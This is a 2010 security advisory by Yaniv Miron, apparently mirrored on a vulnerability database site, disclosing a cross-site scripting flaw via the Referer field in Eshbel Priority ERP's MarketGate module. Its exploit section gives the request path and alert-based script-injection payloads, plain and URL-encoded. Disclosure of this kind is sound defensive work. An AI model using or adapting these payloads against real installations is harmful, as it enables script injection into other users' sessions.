Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:23305
HistoryMar 02, 2010 - 12:00 a.m.

Eshbel Priority MarketGate module Cross Site Scripting Vulnerability

2010-03-0200:00:00
vulners.com
33
JSON

=========================================
Yaniv Miron aka "Lament" Advisory Feb 27, 2010
Eshbel Priority MarketGate module Cross Site Scripting Vulnerability

=====================
I. BACKGROUND

Priority’s ERP

The features listed below are a selection of some of the functionality
available in a selection of the Priority modules.
BI (Business Intelligence), Purchasing, BPM (Business Process Management),
Manufacturing/Production, GL + Financials, Human Resources,
CRM (Customer Relations Management), Project Management,
Order Processing, System Administration, Service and Customer Support,
SDK (Generators), Inventory Control, User Configuration, WMS

http://www.eshbel.com//ERP-Feature.htm

=====================
II. DESCRIPTION

A malicious attacker may inject scripts into the Priority’s ERP application
using the "Referer" field.

=====================
III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary
code using a malicious "Referer" field.

=====================
IV. EXPLOIT

http://example.com/marketgate/PriHtml.dll/WWWxxxxxxxx

Referer: http://example.com/marketgate/priorSysMan.htm

WWWxxxxxxxx=>"'><script>alert(31337)</script>&_yyyyyyyy=>"'><script>alert(31337)</script>

Referer: http://example.com/marketgate/priorSysMan.htm

WWWxxxxxxxx=%3E%22%27%3E%3Cscript%3Ealert%2831337%29%3C%2Fscript%3E&_yyyyyyyy=%3E%22%27%3E%

3Cscript%3Ealert%2831337%29%3C%2Fscript%3E

=====================
V. DISCLOSURE TIMELINE

Jan 2009 Vulnerability Found
Jan 2009 Vendor Notification
Feb 2010 Public Disclosure

=====================
VI. CREDIT

Yaniv Miron aka "Lament".
[email protected]

JSON